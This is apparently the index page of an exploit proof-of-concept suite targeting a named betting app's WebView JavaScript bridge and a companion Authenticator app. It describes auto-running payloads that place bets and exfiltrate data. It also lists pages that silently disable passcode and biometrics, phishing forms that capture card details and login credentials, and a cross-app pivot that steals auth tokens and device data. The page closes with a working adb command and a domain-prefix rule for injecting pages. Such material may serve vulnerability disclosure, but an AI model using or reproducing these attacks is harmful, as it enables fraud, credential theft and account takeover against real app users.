Exploit PoC Suite

Sports App & Authenticator — WebView Intent Exploit

JS Bridge Test

CRITICAL JS Bridge Interactive Test Suite
Full interactive page with buttons for every confirmed bridge method. Betslip manipulation, gaming commands, members commands, Google Pay, clipboard hijack.
CRITICAL Auto-Exploit Payload
Automated probe — detects bridge, enumerates methods, adds bet, exfiltrates data. Runs on page load.

Phishing Demos

CRITICAL Passcode & Biometrics Removal
Silently disables passcode and biometrics on page load via gaming bridge. Shows fake "verify account" phishing UI.
HIGH Credit Card Phishing
Fake "Deposit £5 get £20" promo with credit card form. Captures card details. Countdown timer for urgency.
HIGH Login Credential Phishing
Fake login page inside the bet365 app frame. Captures username and password.
HIGH Google Pay Trigger
Triggers Google Pay payment flow via members bridge.

Data Scraping

DEMO Live Odds Scraper
Subscribes to live odds feeds via pull_subscribe bridge. Exfiltrates data via callback injection.

Cross-App Exploits

CRITICAL Intent Launch (Cross-App Pivot)
Launches arbitrary intents from WebviewCard. Pivots to Authenticator and other apps on the device.
CRITICAL Authenticator Exploit
Targets Authenticator app via deep link domain injection. Exfiltrates geolocation, device ID, auth tokens.

How to load in bet365 WebView:

Via ExploitApp button, or ADB:
adb shell am start -n com.bet365Wrapper.Bet365_Application/com.bet365.sportsbook.EmptyDeepLinkActivity -a android.intent.action.VIEW -d "https://DOMAIN/PAGE.html?code=x"

The domain must start with casino, games, or slots once the https:// prefix is removed.

For local testing: https://casino.127.0.0.1.nip.io:8443/PAGE.html?code=x